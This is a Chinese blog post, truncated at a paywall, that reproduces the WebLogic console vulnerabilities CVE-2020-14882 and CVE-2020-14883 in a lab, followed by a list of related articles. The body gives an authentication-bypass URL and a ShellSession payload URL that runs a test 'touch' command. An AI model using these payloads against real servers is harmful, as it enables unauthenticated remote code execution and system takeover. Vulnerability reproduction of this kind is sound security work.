Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

最新推荐文章于 2024-05-17 03:39:29 发布
原创 最新推荐文章于 2024-05-17 03:39:29 发布 · 3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

 漏洞复现:

首先测试权限绕过漏洞(CVE-2020-14882),访问以下URL,即可未授权访问到管理后台页面:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

 访问后台后,可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码:

此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过com.tangosol.coherence.mvel2.sh.ShellSession

二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

<

最低0.47元/天 解锁文章

200万优质内容无限畅学
shayebudon
关注
weblogic的console控制台修改操作内部流程
灵魂自由的忙人
11-13 4410
控制台修改并保存的信息并不会马上更改配置,只是更改了MBean的树形结构,点击保存按钮并保存在保存在域下pending/config.xml(临时文件的副本)文件下(如图) 整个操作流程如下图: 当在console控制条点击锁定并编辑 修改数据先修改MBean的树状结构 点击保存按钮将修改数据临时保存在域下pending/config.xml文件中,当提交锁定并编辑按钮的时候
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883漏洞复现
weixin_48413667的博客
09-22 8242
一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883
CVE-2020-14882CVE-2020-14883 Weblogic 管理控制台未授权远程命令执行漏洞
weixin_45715461的博客
07-02 1518
CVE-2020-14882CVE-2020-14883 Weblogic 管理控制台未授权远程命令执行漏洞
WeblogicCVE-2020-14882CVE-2020-14883管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6378
WeblogicCVE-2020-14882CVE-2020-14883管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
最新发布
2401_84545046的博客
05-17 989
Oracle Fusion Middleware的Oracle WebLogic Server产品中的漏洞(组件:控制台),允许未经身份验证的攻击者通过HTTP访问网络,从而导致Oracle WebLogic Server被接管。这里我是在虚拟机里面进行登录的,下面的验证是在本机进行验证的。环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。但是,使用其他浏览器发现绕过失败,使用下面的payload可以绕过。
Weblogic 未认证远程命令执行CVE-2020-14882CVE-2020-14883
灰太的表格的博客
11-04 3724
Weblogic 未认证远程命令执行CVE-2020-14882CVE-2020-14883漏洞环境: vulhub 漏洞复现: CVE-2020-14882 允许远程用户绕过管理控制台组件中的身份验证。CVE-2020-14883 允许经过身份验证的用户在管理控制台组件上执行任何命令。使用这两个漏洞的连锁,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机。 1.docker 开个环境: ...
servlet 脚本不执行_Weblogic Console HTTP协议远程代码执行漏洞复现(CVE202014882
weixin_39745933的博客
12-11 481
0x01 漏洞描述近日,Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HT...
Weblogic Pre-Auth 远程命令执行CVE-2020-14882CVE-2020-14883
不曾扬帆,何以至远方
07-15 402
Weblogic Pre-Auth 远程命令执行CVE-2020-14882CVE-2020-14883
Weblogic Admin Console
weixin_33857679的博客
06-27 610
http://localhost:7001/console 转载于:https://www.cnblogs.com/davidgu/archive/2013/02/06/2901756.html
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)漏洞复现
weixin_70045024的博客
09-18 1702
Weblogic
Weblogic Console监控 (上)
cosg6794的博客
11-24 327
JMSRuntime JMSServersCurrentCount 返回当前JMS服务的连接数 ConnectionsCurrentCount 返回本JMS服务器上当前的连接数 JMSServersHighCount 返回...
weblogic console 管理
czj4451的专栏
11-14 210
Oracle的开发工具JDeveloper自带了WebLogic。 1. web项目启动后,打开管理登录页面。输入用户名和密码: [img]http://dl2.iteye.com/upload/attachment/0075/5755/6bd14ccd-7419-3fa2-9a2e-419da1cb4e31.png[/img] 2. 登录成功后,可以对web服务器的各种资源进行...
weblogic console install
关雷
04-10 279
安装jdk 注意weblogic版本及其支持的jdk版本; 卸载OpenJDK,用命令rpm -qa|grep java 和 rpm -qa|grep jdk 显示所有jdk有关的安装包,然后用命令rpm -e --nodeps filename 将文件都删除 rpm -qa|grep java rpm -e --nodeps java-1.7.0-openjdk-1.7.0.45-2.4....
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 7431
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
Weblogic Console HTTP协议远程代码执行漏洞CVE-2020-14882
chaojixiaojingang
10-30 4225
1.漏洞描述 未经身份验证的远程攻击者可通过构造特殊的 HTTP GE请求,利用该漏洞在受影响的WebLogic Server上执行任意代码。 2.影响版本 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Weblogic Server 14.1.1.0.0
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值